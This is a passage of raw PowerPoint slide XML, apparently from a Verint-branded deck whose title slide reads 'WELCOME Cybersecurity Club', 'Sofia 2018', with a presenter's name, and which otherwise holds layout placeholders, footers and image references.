                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Seventh Outline LevelClick to edit master text styles</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389" name="PlaceHolder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4336560" y="4540320"/>
            <a:ext cx="8024400" cy="402120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Seventh Outline LevelClick to edit master text styles</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="390" name="Picture 20" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982880" y="6483240"/>
            <a:ext cx="758880" cy="178560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="11233800" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="2742840" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{3F1952F5-8C0D-4B43-9D30-03209C399F0C}" type="slidenum">
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="PlaceHolder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="1144800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the title text format</a:t>
            </a:r>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28" name="Picture 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982880" y="6483240"/>
            <a:ext cx="758880" cy="178560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="11233800" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="2742840" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{325C1E73-B6F3-416C-BEE8-D939F92AE977}" type="slidenum">
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="431" name="Picture 10" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6480" y="-360"/>
            <a:ext cx="12197880" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="432" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6480" y="-360"/>
            <a:ext cx="12197880" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ffffff"/>
          </a:solidFill>
          <a:ln w="12600">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="433" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="487080" y="492120"/>
            <a:ext cx="11217600" cy="5760000"/>
          </a:xfrm>
          <a:prstGeom prst="snip2DiagRect">
            <a:avLst>
              <a:gd name="adj1" fmla="val 0"/>
              <a:gd name="adj2" fmla="val 20135"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="19080">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487080" y="492120"/>
            <a:ext cx="456840" cy="459360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fa6e1e"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="PlaceHolder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487080" y="3668040"/>
            <a:ext cx="11217600" cy="742320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Seventh Outline LevelClick to edit master text style</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="PlaceHolder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487080" y="2331720"/>
            <a:ext cx="11217600" cy="1145160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the outline text format</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Second Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Third Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buSzPct val="75000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fourth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Fifth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="5">
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sixth Outline Level</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Seventh Outline LevelClick to edit cover title style </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="437" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="11233800" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Confidential and proprietary information of Verint Systems Inc. © All rights reserved worldwide</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="438" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507960" y="6356520"/>
            <a:ext cx="2742840" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{43548D9F-E4B6-4334-9064-74AFFC733B9D}" type="slidenum">
              <a:rPr lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="ffffff"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>&lt;number&gt;</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="439" name="Picture 9" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982880" y="6483240"/>
            <a:ext cx="758880" cy="178560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="PlaceHolder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="273600"/>
            <a:ext cx="10972440" cy="1144800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="0" bIns="0" anchor="ctr"/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Click to edit the title text format</a:t>
            </a:r>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7.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7.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comments" Target="../comments/comment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jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout37.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37.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37.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37.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0" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="905040" y="1422720"/>
            <a:ext cx="10629360" cy="1015560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>WELCOME  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>Cyber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="0099cc"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t> Club</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400">
                <a:solidFill>
                  <a:srgbClr val="f7f7f7"/>
                </a:solidFill>
                <a:latin typeface="Montserrat Medium"/>
                <a:ea typeface="Montserrat Medium"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10725480" y="6488640"/>
            <a:ext cx="1400400" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="bfbfbf"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Sofia 2018</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9828720" y="6119280"/>
            <a:ext cx="2262960" cy="364680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="bfbfbf"/>
                </a:solidFill>
                <a:latin typeface="Century Gothic"/>
              </a:rPr>
              <a:t>Joachim De Zutter</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:transition>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3" name="TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1651320" y="368640"/>
            <a:ext cx="11245320" cy="632520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
